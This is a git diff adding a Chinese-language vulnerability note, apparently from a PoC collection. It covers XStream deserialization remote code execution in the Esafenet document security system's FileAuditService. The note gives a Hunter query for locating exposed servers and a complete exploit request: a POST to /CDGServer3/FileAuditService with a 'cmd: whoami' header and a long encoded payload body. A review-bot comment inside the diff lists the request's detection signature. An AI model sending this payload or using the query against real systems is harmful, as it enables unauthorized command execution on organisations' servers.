OIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKH
JIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706603842893-f6b4f8d3-7658-430d-a752-eadf34f3fb36.png](./img/dO2u_IB_Mn-UFxxN/1706603842893-f6b4f8d3-7658-430d-a752-eadf34f3fb36-300440.png) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/axqk1fycl9lfr028> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统FileAuditService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统FileAuditService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..68c8c5a --- /dev/null 
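Review bot: the `二、影响版本` section of this hunk lists only the product name (`亿赛通电子文档安全管理系统`) with no version range, so an operator cannot tell whether a given deployment is affected; state the versions tested and, if known, the fixed version. In `四、漏洞复现` the request passes the command in a custom `cmd: whoami` header and sends an opaque encoded body (`Content-Length: 14756`) whose structure is not described; document what the body contains so the PoC can be reviewed, and since `Host: 192.168.110.187:8090` is a lab address, mark it as a placeholder. For defenders it would help to spell out the observable signature the request lines already show: a `POST /CDGServer3/ExamCDGDocService1` with `Content-Type: text/xml` and a `cmd` request header. The file again ends without a trailing newline.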
+++ b/亿赛通电子文档安全管理系统FileAuditService存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统FileAuditService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统FileAuditService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/yTQ58mMqQbk7Uyqu/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-686953.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/FileAuditService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJ
HJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFA
MILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIG
OFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECAL
MLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCP
OCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEO
LIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLG